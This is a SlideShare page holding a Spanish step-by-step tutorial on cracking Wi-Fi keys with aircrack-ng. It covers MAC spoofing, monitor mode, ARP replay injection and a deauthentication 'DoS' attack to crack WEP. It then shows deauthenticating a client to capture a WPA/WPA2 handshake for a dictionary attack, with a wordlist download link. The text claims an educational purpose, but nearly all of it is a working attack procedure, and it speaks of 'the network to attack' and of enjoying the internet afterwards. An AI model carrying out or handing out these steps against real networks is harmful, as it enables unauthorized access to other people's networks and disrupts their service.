SlideShare una empresa de Scribd logo
4
Lo más leído
6
Lo más leído
7
Lo más leído
TUTORIAL DE AIRCRACK­NG




                                                      Paolo Norambuena
                                                       Estudiante Ingeniería (e)
                                                  en Computación e Informática
                                            Universidad del Bío-Bío, Concepción.




Tutorial de Aircrack­ng by Paolo Norambuena is licensed under a Creative 
  Commons Atribución­No Comercial­Licenciar Igual 2.0 Chile License. 
Tutorial de Aircrack­ng by Paolo Norambuena is licensed under a Creative 
  Commons Atribución­No Comercial­Licenciar Igual 2.0 Chile License. 
AIRCRACK­NG
Esta es una guía con fines educativos para el uso y manipulación de Aircrack­ng 
sobre   las   distintas   distribuciones   de   Linux.   Se   explicará   desde   su   instalación   en 
sistemas   como   Mandriva,   Ubuntu,   Debian,   OpenSuse   y   SlackWare   para   que 
posteriormente no existan dudas sobre ninguna distribución.


En   primer   lugar   debemos   tener   instalado   en   nuestro   sistema   el   Driver   del 

Fabricante   de   nuestra   tarjeta   de   red,  aircrack­ng  no   funciona   con   drivers 

emulados por ndiswrapper. 


Instalando Aircrack­ng


En   este   apartado   instalaremos   aircrack­ng   en   las   distintas   distribuciones 
comenzando por Ubuntu.


Ubuntu.


$ sudo apt­get install aircrack­ng


Mandriva


# urpmi aircrack­ng


OpenSUSE


Descargar:
ftp://ftp.pbone.net/mirror/packman.iu­bremen.de/suse/11.0/SRPMS/aircrack­ng­1.0rc3­
0.pm.1.nosrc.rpm

Instalar haciendo Doble Click al paquete una vez descargado.
SlackWare


Descargar 
http://repository.slacky.eu/slackware­12.2/security/aircrack­ng/1.0rc3/aircrack­ng­
1.0rc3­i486­1dd.tgz


Una vez descargado por consola (terminal – konsole, etc), ejecutar 


# installpkg aircrack­ng­1.0rc3­i486­1dd.tgz


                               Paquetes complementarios.


Una vez instalado aircrack­ng puede ser necesario la instalación de un paquete 
adicional   por   lo   cual   descargaremos  IW,  que   es   un   complemento   para   poner 
nuestra tarjeta inalámbrica en modo monitor.


según la distribución será necesario actualizar la librería libnl
       $ sudo apt­get install libnl1*  (ubuntu, debian)
       # urpmi ­a libnl (mandriva)


Instalada y/o actualizada la librería procedemos a descargar iw.


# wget http://wireless.kernel.org/download/iw/iw­0.9.13.tar.bz2
# tar jxvf iw­0.9.13.tar.bz2
# cd iw­0.9.13
# make
#make install


Y de esta forma ya tenemos aircrack­ng y su componente para poner en modo 
monitor nuestra wireless.
Ahora solo nos queda empezar a trabajar.


                               Recuperando Claves.


Ahora empezamos nuestro trabajo, lo que se realizó anteriormente solo se hace 
una vez, que es para instalar y configurar de buena forma nuestra suite, lo que se 
realiza siempre es lo que a continuación se detalla.


Para quienes creen que cambiar su mac es necesario, pueden hacerlo asi


Mandriva :


# ifconfig (wlan0, eth1, etc) down
# ifconfig (wlan0, eth1, etc) hw ether 00:11:22:33:44:55
# ifconfig (wlan0, eth1, etc) up


Debian / Ubuntu :


$ sudo ifconfig (wlan0, eth1, etc) down
$ sudo  ifconfig (wlan0, eth1, etc) hw ether 00:11:22:33:44:55
$ sudo  ifconfig (wlan0, eth1, etc) up


Slackware :


# ifconfig (wlan0, eth1, etc) down
# ifconfig (wlan0, eth1, etc) hw ether 00:11:22:33:44:55
# /etc/rc.d/rc.inet1 (wlan0, eth1, etc) start




    IMPORTANTE: Las direcciones mac SIEMPRE deben iniciar con 00
Para saber cual es nuestra MAC debemos ejecutar 


       #ifconfig (wlan0, eth1, etc) | grep Hwaddr 




De   la   vista   anterior   podemos   sacar   nuestra   dirección   mac   de  HWaddr  la   serie 
numerica  que acompaña  la instrucción  antes   destacada  es  nuestra dirección, 
que utilizaremos desde ahora en adelante.
Airmon­ng.


      Airmon­ng   es   parte   de   la   suite   de   aircrack­ng   la   cual   permite   crear   la 
interfaz mon0  en modo monitor. Su utilización es la siguiente


                           # airmon­ng start (wlan0, eth1, etc)




En   caso   de   que   nos   muestre   un   error   podemos   utilizar   iw   que   instalamos 
anteriormente.
             # iw dev wlan0 interface add mon0 type monitor
Y con esto ya tenemos el primer paso completo.


Airodump­ng


       # airodump­ng mon0




De esta forma veremos todas las redes disponibles con sus respectivos canales, 
una   vez   que   ya   encontramos   nuestra   red   creamos   un   filtro   con   el   canal   de 
trabajo, en este caso canal 6 (columna CH), paramos la ejecución de airodump­
ng presionando Ctrl + C, y posteriormente ejecutamos:


   ­c = Filtro de canal 6, 11, 1, etc.
   ­w = Escribir resultados en un documento.


# airodump­ng ­c 6 ­w nombre mon0
De esta forma hemos creado un filtro que solo trabajará en el canal indicado (6).




                              Nuestra red es Jimmy
Aireplay­Ng


Una vez que airodump­ng ya está trabajando, abrimos una nueva consola donde 
empezaremos a trabajar con aireplay­ng.


Lo primero que debemos hacer con aireplay­ng es asociarnos a la red.


#aireplay­ng ­1 6000 ­q 10 ­o 1 ­e (ESSID Router) ­a (Mac Router) ­h (nuestra mac) 
mon0
Donde :


      ­1 6000 = Autentificará cada 6000 segundos.
      ­q 10 = Intervalo de tiempo en que enviará un paquete “Keep Alive”
      ­o 1 = Cantidad de paquetes “keep allive” que enviará


Creo que muchos se pueden preguntar, ¿de donde obtengo el ESSID y la Mac del 
Router?. Bueno, si recordamos en la consola anterior ejecutamos airodump­ng, de 
esa pantalla encontramos las columnas BSSID y ESSID que corresponden a la mac 
y la ESSID o nombre del router respectivamente.


De esta forma estaremos asociados a la red la cual cada 10 segundos aireplay­ng 
mandará un paquete llamado “KEEP­ALIVE”, lo que avisará al router que seguimos 
asociados y asi no nos botará a cada rato.
Ya asociados procedemos a enviar y capturar paquetes, para eso en una nueva 
consola ejecutaremos nuevamente aireplay­ng pero en modo agresivo.


#aireplay­ng ­3 ­b (Mac del router) ­h (nuestra mac) mon0




De la imagen anterior lo que nos interesa es que aumenten los ARP, ya que son 
esos los paquetes capturados y los que además nos entregarán la clave buscada.
Una vez que tenemos desde 150.000 paquetes capturados empezamos a trabajar 
con aircrack­ng.


Nunca está demás recordar que mientras mas paquetes capturados, es mucho 
mejor, ya que más pronto obtendremos la clave.
En caso de que este ataque no capture paquetes ARP o que en mucho tiempo 
hayamos   capturado   pocos   paquetes,   podemos   realizar   un   Ataque   DoS 
(Denegación de Servicios). Para realizar este ataque es necesario simplemente 
saber la dirección Mac del Router, dato que por lo demás, hemos utilizado para 
cada acción con aircrack­ng y sus componentes.


Ahora ¿Como realizamos el ataque DoS con aircrack­ng?


      R: // #aireplay­ng ­0 0 ­a (Mac Router) mon0




Con eso ya estaríamos acelerando la transferencia y captura de paquetes.


Aircrack­Ng


      Ya   estamos   en   el   paso   final,   con   los   paquetes   de   datos   capturados 
procedemos a ejecutar aircrack­ng, para lo cual tenemos dos formas, una lenta 
pero efectiva, y una rápida pero se necesita una mayor cantidad de paquetes 
para desencriptar la clave.
Forma lenta
#aircrack­ng *.cap
Forma Rápida (se necesita mayor cantidad de paquetes capturados)
       #aircrack­ng ­z *.cap




De   esta   forma   ya   hemos   desencriptado   la   clave   que   buscabamos,   solo   nos 
queda hacer configurar la clave en el cliente de conexión para eso solo tienen 
que borrar los dos puntos ( : ) que hay entre cada par de caracteres, ahora a 
disfrutar de internet.

                                    Recordatorio.
–   Al finalizar este tutorial, cabe recordar que la distancia afecta nuestro trabajo, 
    si estamos muy lejos de la red a atacar la transferencia y captura de paquetes 
    será muy lenta llegando incluso a ser nula. Por lo cual es recomendable estar a 
    una distancia prudente para poder realizar la captura de forma rápida.
–   Los drivers para las tarjetas inalambricas deben ser los propietarios, no se puede 
    realizar por emulación de drivers, en este caso con ndiswrapper, por ejemplo.


–   Las acciones deben ser ejecutadas como Super Usuario (root) en los sistemas 
    que lo permitan, en caso de Ubuntu, se debe ejecutar con sudo.


–   Las   direcciones   mac   SIEMPRE   deben   iniciar   con   00   en   caso   de   que   las 
    cambien en forma manual.


–   Si no aireplay­ng no inyecta ni captura paquetes, realizamos un ataque DoS 
    con aireplay #aireplay­ng ­0 0 ­a (Mac Router) mon0
–   Todo lo que tenga # en Ubuntu se debe ejecutar con sudo.



                                       Finalizando.
Espero que este tutorial sea de utilidad para cada persona que lo lea. Este tutorial 
está   enfocado   en   una   forma   de   ataque,   en   aircrack­ng   existen   muchos   otros 
métodos, algunos más complicados que otros, pero la idea es aprender y adoptar 
la forma más cómoda para cada uno.


Agradecimientos Aníbal “Chavo” Zapata, por la instrucción de ataque DoS.
Información   recopilada   de   distintos   sitios   de   internet,   especialmente   de 
http://www.aircrack­ng.org/doku.php sitio oficial de Aircrack­ng.


En caso de duda, contactar a wjotta@gmail.com




     Tutorial de Aircrack­ng by Paolo Norambuena is licensed under a Creative 
        Commons Atribución­No Comercial­Licenciar Igual 2.0 Chile License. 
Parte 2 :


Recuperando 
   Claves 
WPA/WPA2 Con 
 Aircrack­ng
Introducción.

De   seguro   muchos   se   han   preguntado,   ¿como   poder   recuperar   la   clave 
wpa/wpa2 de mi router sin tener que resetearlo?, bueno al igual que antes, la 
respuesta es con aircrack­ng.


En esta sección se demostrará como en unos pocos pasos se puede obtener la 
clave en forma rápida, los ingredientes para recuperar estas claves son :


   –   Equipo con tarjeta inalambrica.
   –   Distro de Linux Instalada o Live CD.
   –   Suite Aircrack­NG instalada (se detallo en la primera parte).
   –   Diccionario de palabras.
   –   Saber la dirección MAC de nuestra tarjeta (se vio en la sección anterior)




                                    airmon­ng



Comenzando con esta parte debemos poner nuestra tarjeta en modo monitor


                         # airmon­ng start (wlan0, eth1, etc)
En   caso   de   que   nos   muestre   un   error   podemos   utilizar   iw   que   instalamos 
anteriormente.
             # iw dev wlan0 interface add mon0 type monitor




Y con esto ya tenemos el primer paso completo.
Airodump­ng




#airodump­ng ­c (numero de canal) ­w (nombre archivo) mon0


Así estamos escaneando las redes existentes en un solo canal, esta consola debe 
seguir trabajando sin ser detenida.


De esta pantalla necesitaremos los siguientes datos con los cuales trabajaremos el 
resto del tutorial.


Nombre del Router (ESSID) : wifi­ubb
Mac del Router (BSSID) : 00:1A:70:EE:5E:D6
Dirección MAC de un cliente : 00:16:44:A2:40:D4
Aireplay­ng


Ya tenemos los datos necesarios y airodump­ng sigue en funcionamiento, por lo 
cual ahora es el turno de aireplay­ng.


En una nueva consola ejecutamos :
       # aireplay­ng ­0 1 ­a 00:1A:70:EE:5E:D6 ­c 00:16:44:A2:40:D4 mon0


donde tenemos


 ­0 : deautenticación

  1   :   es   el   número   de   deautenticaciones   enviadas   (puedes   enviar   infinitas   si   se 
deseas. Para infinito es 0)

 ­a : es la dirección MAC del punto de acceso o Router

 ­c : es la dirección MAC del cliente que queremos deautenticar


De   esta   forma   estamos   capturando   el  handshake  que   necesitamos   para 
desencriptar la clave.


Una   vez   que   se   ha   captura   el   handshake   ejecutamos   aircrack­ng   para   su 
desencriptación.


Para aircrack las instrucciones son las siguientes

# aircrack­ng ­w diccionario ­b 00:1A:70:EE:5E:D6 *.cap
Y posteriormente, obtendremos nuestra clave con una salida como esta




                                       Recomendaciones.


Para trabajar con claves tipo WPA/WPA2 es necesario poder contar con un buen 
diccionario de palabras, ya que el trabajo de aircrack­ng es ir comparando el 
handshake con cada una de las palabras del diccionario que tenemos. 

Pueden descargar un diccionario de palabras desde aquí 

               http://wjota.uuuq.com/tutoriales/diccionario.zip 

Que   es   el   diccionario   que   se   utilizó   para   el   ejemplo,   y   puede   ser   modificado, 
agregando o quitando palabras.




     Tutorial de Aircrack­ng by Paolo Norambuena is licensed under a Creative 
        Commons Atribución­No Comercial­Licenciar Igual 2.0 Chile License. 

Más contenido relacionado

PPT
Lokasyon ng Pilipinas
PPTX
Grade 6 - Consumer Health and Over the Counter Medicines
PPTX
The three dimensions of success (success in 3 ds)
PPTX
ARALING PANLIPUNAN GRADE 6 QUARTER 3 WEEK 1
PPTX
#4 gr.-3 elements of a computer system - 4
PPTX
ATOM..ACT 1&2.pptx
PPTX
Summative Test No 1 in Q3 Math 6.pptx
PPTX
Ang Pinagmulan ng Pilipinas
Lokasyon ng Pilipinas
Grade 6 - Consumer Health and Over the Counter Medicines
The three dimensions of success (success in 3 ds)
ARALING PANLIPUNAN GRADE 6 QUARTER 3 WEEK 1
#4 gr.-3 elements of a computer system - 4
ATOM..ACT 1&2.pptx
Summative Test No 1 in Q3 Math 6.pptx
Ang Pinagmulan ng Pilipinas

La actualidad más candente (20)

PPTX
Rational Expressions
PPTX
Teaching-Beginning-Reading_English_The-Four-Pronged-Approach.pptx
PPTX
Pangngalan
PPTX
Lesson 5 - Comparing and Ordering Similar Fractions
DOCX
10 pinakamaunlad na negosyante
PPTX
Paggamit ng mga Bagong Salitang Natutuhan.pptx
PPTX
Balangkas at layunin ng pamahalaang komonwelt
PPT
Pangungusap at parirala
PPTX
PPT MATH 5 Q1 MULTIPLIES A FRACTION AND A WHOLE NUMBER AND ANOTHER FRACTION.pptx
PPT
Presentation1
PPTX
ESP ARALIN 1 YUNIT 1.pptx
PPTX
Pagsagot ng mga tanong tungkol sa balitang napakinggan
PPTX
MDAS (Multiply, Divide, Add ànd Subtract 37.pptx
PPTX
Adding Similar Fraction Without Regrouping
PDF
Rhythm, Melody, and Harmony
PPTX
ANG PILIPINAS BILANG ISANG BANSA 1.pptx
PPTX
Ang silaba
PPTX
Syllables sa se si so su
PPTX
ARALIN 2- LOKASYON NG PILIPINAS.pptx AP 5
DOCX
Ang mga Bahagi ng Computer.docx
Rational Expressions
Teaching-Beginning-Reading_English_The-Four-Pronged-Approach.pptx
Pangngalan
Lesson 5 - Comparing and Ordering Similar Fractions
10 pinakamaunlad na negosyante
Paggamit ng mga Bagong Salitang Natutuhan.pptx
Balangkas at layunin ng pamahalaang komonwelt
Pangungusap at parirala
PPT MATH 5 Q1 MULTIPLIES A FRACTION AND A WHOLE NUMBER AND ANOTHER FRACTION.pptx
Presentation1
ESP ARALIN 1 YUNIT 1.pptx
Pagsagot ng mga tanong tungkol sa balitang napakinggan
MDAS (Multiply, Divide, Add ànd Subtract 37.pptx
Adding Similar Fraction Without Regrouping
Rhythm, Melody, and Harmony
ANG PILIPINAS BILANG ISANG BANSA 1.pptx
Ang silaba
Syllables sa se si so su
ARALIN 2- LOKASYON NG PILIPINAS.pptx AP 5
Ang mga Bahagi ng Computer.docx
Publicidad

Destacado (6)

PDF
Tutorial de beni
PDF
Como usar Aircrack
PPTX
Aircrack ng
PDF
A tutorial showing you how to crack wifi passwords using kali linux!
PPT
Manual para romper contraseñas WEP y WPA
DOCX
Protocolos De Seguridad En Redes
Tutorial de beni
Como usar Aircrack
Aircrack ng
A tutorial showing you how to crack wifi passwords using kali linux!
Manual para romper contraseñas WEP y WPA
Protocolos De Seguridad En Redes
Publicidad

Similar a Crackeando con aircrack (20)

ODT
Aircrack ng: comandos básicos
PDF
PDF
Backtrack 3 manual
PDF
Bactrack4
PDF
Bactrack4
PDF
Wep wpa wpa2-cracking
PDF
Wep wpa wpa2-cracking
PDF
Funcionamiento básico y primeros pasos en wifislax
PDF
Hackeo y cracking de wifi
PDF
Crack redes wifi
PDF
Aircrak (Ubuntu)
PDF
Testing Redes Inalambricas wifiway (Definiciones))
DOC
Tutorial claves-wep
PDF
Tuto back track 4
DOCX
REDES INALAMBRICAS
DOC
Descifrar claves wifi wpa wpa2 desde linux(ubuntu)
PDF
Crackeando redes wep
PDF
Wifislax
PDF
Workshop Seguridad Wireless
Aircrack ng: comandos básicos
Backtrack 3 manual
Bactrack4
Bactrack4
Wep wpa wpa2-cracking
Wep wpa wpa2-cracking
Funcionamiento básico y primeros pasos en wifislax
Hackeo y cracking de wifi
Crack redes wifi
Aircrak (Ubuntu)
Testing Redes Inalambricas wifiway (Definiciones))
Tutorial claves-wep
Tuto back track 4
REDES INALAMBRICAS
Descifrar claves wifi wpa wpa2 desde linux(ubuntu)
Crackeando redes wep
Wifislax
Workshop Seguridad Wireless

Más de Emilson Papo-rriarte (9)

PDF
PPTX
PPTX
PPSX
Gentoo Linux
PDF
Beini(bt5) maunal
PPSX
PPSX
Todo sobre la ip.

Último (20)

PDF
Influencia-del-uso-de-redes-sociales.pdf
PDF
informe_fichas1y2_corregido.docx (2) (1).pdf
PDF
Maste clas de estructura metálica y arquitectura
PPTX
Sesion 1 de microsoft power point - Clase 1
PPTX
Power Point Nicolás Carrasco (disertación Roblox).pptx
PDF
Tips de Seguridad para evitar clonar sus claves del portal bancario.pdf
PPTX
COMO AYUDAN LAS TIC EN LA EDUCACION SUPERIOR.pptx
PDF
programa-de-estudios-2011-guc3ada-para-el-maestro-secundarias-tecnicas-tecnol...
PDF
MANUAL de recursos humanos para ODOO.pdf
PPTX
Acronis Cyber Protect Cloud para Ciber Proteccion y Ciber Seguridad LATAM - A...
PDF
CyberOps Associate - Cisco Networking Academy
PDF
clase auditoria informatica 2025.........
PPTX
historia_web de la creacion de un navegador_presentacion.pptx
PPTX
Presentacion de Alba Curso Auditores Internos ISO 19011
PDF
SAP Transportation Management para LSP, TM140 Col18
PDF
Ronmy José Cañas Zambrano - Potenciando la tecnología en Venezuela.pdf
PPTX
RAP02 - TECNICO SISTEMAS TELEINFORMATICOS.pptx
PDF
Diapositiva proyecto de vida, materia catedra
PPTX
Curso de generación de energía mediante sistemas solares
PPT
introduccion a las_web en el 2025_mejoras.ppt
Influencia-del-uso-de-redes-sociales.pdf
informe_fichas1y2_corregido.docx (2) (1).pdf
Maste clas de estructura metálica y arquitectura
Sesion 1 de microsoft power point - Clase 1
Power Point Nicolás Carrasco (disertación Roblox).pptx
Tips de Seguridad para evitar clonar sus claves del portal bancario.pdf
COMO AYUDAN LAS TIC EN LA EDUCACION SUPERIOR.pptx
programa-de-estudios-2011-guc3ada-para-el-maestro-secundarias-tecnicas-tecnol...
MANUAL de recursos humanos para ODOO.pdf
Acronis Cyber Protect Cloud para Ciber Proteccion y Ciber Seguridad LATAM - A...
CyberOps Associate - Cisco Networking Academy
clase auditoria informatica 2025.........
historia_web de la creacion de un navegador_presentacion.pptx
Presentacion de Alba Curso Auditores Internos ISO 19011
SAP Transportation Management para LSP, TM140 Col18
Ronmy José Cañas Zambrano - Potenciando la tecnología en Venezuela.pdf
RAP02 - TECNICO SISTEMAS TELEINFORMATICOS.pptx
Diapositiva proyecto de vida, materia catedra
Curso de generación de energía mediante sistemas solares
introduccion a las_web en el 2025_mejoras.ppt

Crackeando con aircrack

  • 1. TUTORIAL DE AIRCRACK­NG Paolo Norambuena Estudiante Ingeniería (e) en Computación e Informática Universidad del Bío-Bío, Concepción. Tutorial de Aircrack­ng by Paolo Norambuena is licensed under a Creative  Commons Atribución­No Comercial­Licenciar Igual 2.0 Chile License. 
  • 3. AIRCRACK­NG Esta es una guía con fines educativos para el uso y manipulación de Aircrack­ng  sobre   las   distintas   distribuciones   de   Linux.   Se   explicará   desde   su   instalación   en  sistemas   como   Mandriva,   Ubuntu,   Debian,   OpenSuse   y   SlackWare   para   que  posteriormente no existan dudas sobre ninguna distribución. En   primer   lugar   debemos   tener   instalado   en   nuestro   sistema   el   Driver   del  Fabricante   de   nuestra   tarjeta   de   red,  aircrack­ng  no   funciona   con   drivers  emulados por ndiswrapper.  Instalando Aircrack­ng En   este   apartado   instalaremos   aircrack­ng   en   las   distintas   distribuciones  comenzando por Ubuntu. Ubuntu. $ sudo apt­get install aircrack­ng Mandriva # urpmi aircrack­ng OpenSUSE Descargar: ftp://ftp.pbone.net/mirror/packman.iu­bremen.de/suse/11.0/SRPMS/aircrack­ng­1.0rc3­ 0.pm.1.nosrc.rpm Instalar haciendo Doble Click al paquete una vez descargado.
  • 4. SlackWare Descargar  http://repository.slacky.eu/slackware­12.2/security/aircrack­ng/1.0rc3/aircrack­ng­ 1.0rc3­i486­1dd.tgz Una vez descargado por consola (terminal – konsole, etc), ejecutar  # installpkg aircrack­ng­1.0rc3­i486­1dd.tgz Paquetes complementarios. Una vez instalado aircrack­ng puede ser necesario la instalación de un paquete  adicional   por   lo   cual   descargaremos  IW,  que   es   un   complemento   para   poner  nuestra tarjeta inalámbrica en modo monitor. según la distribución será necesario actualizar la librería libnl $ sudo apt­get install libnl1*  (ubuntu, debian) # urpmi ­a libnl (mandriva) Instalada y/o actualizada la librería procedemos a descargar iw. # wget http://wireless.kernel.org/download/iw/iw­0.9.13.tar.bz2 # tar jxvf iw­0.9.13.tar.bz2 # cd iw­0.9.13 # make #make install Y de esta forma ya tenemos aircrack­ng y su componente para poner en modo  monitor nuestra wireless.
  • 5. Ahora solo nos queda empezar a trabajar. Recuperando Claves. Ahora empezamos nuestro trabajo, lo que se realizó anteriormente solo se hace  una vez, que es para instalar y configurar de buena forma nuestra suite, lo que se  realiza siempre es lo que a continuación se detalla. Para quienes creen que cambiar su mac es necesario, pueden hacerlo asi Mandriva : # ifconfig (wlan0, eth1, etc) down # ifconfig (wlan0, eth1, etc) hw ether 00:11:22:33:44:55 # ifconfig (wlan0, eth1, etc) up Debian / Ubuntu : $ sudo ifconfig (wlan0, eth1, etc) down $ sudo  ifconfig (wlan0, eth1, etc) hw ether 00:11:22:33:44:55 $ sudo  ifconfig (wlan0, eth1, etc) up Slackware : # ifconfig (wlan0, eth1, etc) down # ifconfig (wlan0, eth1, etc) hw ether 00:11:22:33:44:55 # /etc/rc.d/rc.inet1 (wlan0, eth1, etc) start     IMPORTANTE: Las direcciones mac SIEMPRE deben iniciar con 00
  • 6. Para saber cual es nuestra MAC debemos ejecutar  #ifconfig (wlan0, eth1, etc) | grep Hwaddr  De   la   vista   anterior   podemos   sacar   nuestra   dirección   mac   de  HWaddr  la   serie  numerica  que acompaña  la instrucción  antes   destacada  es  nuestra dirección,  que utilizaremos desde ahora en adelante.
  • 7. Airmon­ng. Airmon­ng   es   parte   de   la   suite   de   aircrack­ng   la   cual   permite   crear   la  interfaz mon0  en modo monitor. Su utilización es la siguiente # airmon­ng start (wlan0, eth1, etc) En   caso   de   que   nos   muestre   un   error   podemos   utilizar   iw   que   instalamos  anteriormente. # iw dev wlan0 interface add mon0 type monitor
  • 8. Y con esto ya tenemos el primer paso completo. Airodump­ng # airodump­ng mon0 De esta forma veremos todas las redes disponibles con sus respectivos canales,  una   vez   que   ya   encontramos   nuestra   red   creamos   un   filtro   con   el   canal   de  trabajo, en este caso canal 6 (columna CH), paramos la ejecución de airodump­ ng presionando Ctrl + C, y posteriormente ejecutamos: ­c = Filtro de canal 6, 11, 1, etc. ­w = Escribir resultados en un documento. # airodump­ng ­c 6 ­w nombre mon0
  • 9. De esta forma hemos creado un filtro que solo trabajará en el canal indicado (6). Nuestra red es Jimmy Aireplay­Ng Una vez que airodump­ng ya está trabajando, abrimos una nueva consola donde  empezaremos a trabajar con aireplay­ng. Lo primero que debemos hacer con aireplay­ng es asociarnos a la red. #aireplay­ng ­1 6000 ­q 10 ­o 1 ­e (ESSID Router) ­a (Mac Router) ­h (nuestra mac)  mon0
  • 10. Donde : ­1 6000 = Autentificará cada 6000 segundos. ­q 10 = Intervalo de tiempo en que enviará un paquete “Keep Alive” ­o 1 = Cantidad de paquetes “keep allive” que enviará Creo que muchos se pueden preguntar, ¿de donde obtengo el ESSID y la Mac del  Router?. Bueno, si recordamos en la consola anterior ejecutamos airodump­ng, de  esa pantalla encontramos las columnas BSSID y ESSID que corresponden a la mac  y la ESSID o nombre del router respectivamente. De esta forma estaremos asociados a la red la cual cada 10 segundos aireplay­ng  mandará un paquete llamado “KEEP­ALIVE”, lo que avisará al router que seguimos  asociados y asi no nos botará a cada rato.
  • 12. En caso de que este ataque no capture paquetes ARP o que en mucho tiempo  hayamos   capturado   pocos   paquetes,   podemos   realizar   un   Ataque   DoS  (Denegación de Servicios). Para realizar este ataque es necesario simplemente  saber la dirección Mac del Router, dato que por lo demás, hemos utilizado para  cada acción con aircrack­ng y sus componentes. Ahora ¿Como realizamos el ataque DoS con aircrack­ng? R: // #aireplay­ng ­0 0 ­a (Mac Router) mon0 Con eso ya estaríamos acelerando la transferencia y captura de paquetes. Aircrack­Ng Ya   estamos   en   el   paso   final,   con   los   paquetes   de   datos   capturados  procedemos a ejecutar aircrack­ng, para lo cual tenemos dos formas, una lenta  pero efectiva, y una rápida pero se necesita una mayor cantidad de paquetes  para desencriptar la clave. Forma lenta #aircrack­ng *.cap
  • 13. Forma Rápida (se necesita mayor cantidad de paquetes capturados) #aircrack­ng ­z *.cap De   esta   forma   ya   hemos   desencriptado   la   clave   que   buscabamos,   solo   nos  queda hacer configurar la clave en el cliente de conexión para eso solo tienen  que borrar los dos puntos ( : ) que hay entre cada par de caracteres, ahora a  disfrutar de internet. Recordatorio. – Al finalizar este tutorial, cabe recordar que la distancia afecta nuestro trabajo,  si estamos muy lejos de la red a atacar la transferencia y captura de paquetes  será muy lenta llegando incluso a ser nula. Por lo cual es recomendable estar a  una distancia prudente para poder realizar la captura de forma rápida.
  • 14. Los drivers para las tarjetas inalambricas deben ser los propietarios, no se puede  realizar por emulación de drivers, en este caso con ndiswrapper, por ejemplo. – Las acciones deben ser ejecutadas como Super Usuario (root) en los sistemas  que lo permitan, en caso de Ubuntu, se debe ejecutar con sudo. – Las   direcciones   mac   SIEMPRE   deben   iniciar   con   00   en   caso   de   que   las  cambien en forma manual. – Si no aireplay­ng no inyecta ni captura paquetes, realizamos un ataque DoS  con aireplay #aireplay­ng ­0 0 ­a (Mac Router) mon0 – Todo lo que tenga # en Ubuntu se debe ejecutar con sudo. Finalizando. Espero que este tutorial sea de utilidad para cada persona que lo lea. Este tutorial  está   enfocado   en   una   forma   de   ataque,   en   aircrack­ng   existen   muchos   otros  métodos, algunos más complicados que otros, pero la idea es aprender y adoptar  la forma más cómoda para cada uno. Agradecimientos Aníbal “Chavo” Zapata, por la instrucción de ataque DoS. Información   recopilada   de   distintos   sitios   de   internet,   especialmente   de  http://www.aircrack­ng.org/doku.php sitio oficial de Aircrack­ng. En caso de duda, contactar a wjotta@gmail.com Tutorial de Aircrack­ng by Paolo Norambuena is licensed under a Creative  Commons Atribución­No Comercial­Licenciar Igual 2.0 Chile License. 
  • 15. Parte 2 : Recuperando  Claves  WPA/WPA2 Con  Aircrack­ng
  • 16. Introducción. De   seguro   muchos   se   han   preguntado,   ¿como   poder   recuperar   la   clave  wpa/wpa2 de mi router sin tener que resetearlo?, bueno al igual que antes, la  respuesta es con aircrack­ng. En esta sección se demostrará como en unos pocos pasos se puede obtener la  clave en forma rápida, los ingredientes para recuperar estas claves son : – Equipo con tarjeta inalambrica. – Distro de Linux Instalada o Live CD. – Suite Aircrack­NG instalada (se detallo en la primera parte). – Diccionario de palabras. – Saber la dirección MAC de nuestra tarjeta (se vio en la sección anterior) airmon­ng Comenzando con esta parte debemos poner nuestra tarjeta en modo monitor # airmon­ng start (wlan0, eth1, etc)
  • 17. En   caso   de   que   nos   muestre   un   error   podemos   utilizar   iw   que   instalamos  anteriormente. # iw dev wlan0 interface add mon0 type monitor Y con esto ya tenemos el primer paso completo.
  • 19. Aireplay­ng Ya tenemos los datos necesarios y airodump­ng sigue en funcionamiento, por lo  cual ahora es el turno de aireplay­ng. En una nueva consola ejecutamos : # aireplay­ng ­0 1 ­a 00:1A:70:EE:5E:D6 ­c 00:16:44:A2:40:D4 mon0 donde tenemos  ­0 : deautenticación   1   :   es   el   número   de   deautenticaciones   enviadas   (puedes   enviar   infinitas   si   se  deseas. Para infinito es 0)  ­a : es la dirección MAC del punto de acceso o Router  ­c : es la dirección MAC del cliente que queremos deautenticar De   esta   forma   estamos   capturando   el  handshake  que   necesitamos   para  desencriptar la clave. Una   vez   que   se   ha   captura   el   handshake   ejecutamos   aircrack­ng   para   su  desencriptación. Para aircrack las instrucciones son las siguientes # aircrack­ng ­w diccionario ­b 00:1A:70:EE:5E:D6 *.cap
  • 20. Y posteriormente, obtendremos nuestra clave con una salida como esta Recomendaciones. Para trabajar con claves tipo WPA/WPA2 es necesario poder contar con un buen  diccionario de palabras, ya que el trabajo de aircrack­ng es ir comparando el  handshake con cada una de las palabras del diccionario que tenemos.  Pueden descargar un diccionario de palabras desde aquí  http://wjota.uuuq.com/tutoriales/diccionario.zip  Que   es   el   diccionario   que   se   utilizó   para   el   ejemplo,   y   puede   ser   modificado,  agregando o quitando palabras. Tutorial de Aircrack­ng by Paolo Norambuena is licensed under a Creative  Commons Atribución­No Comercial­Licenciar Igual 2.0 Chile License.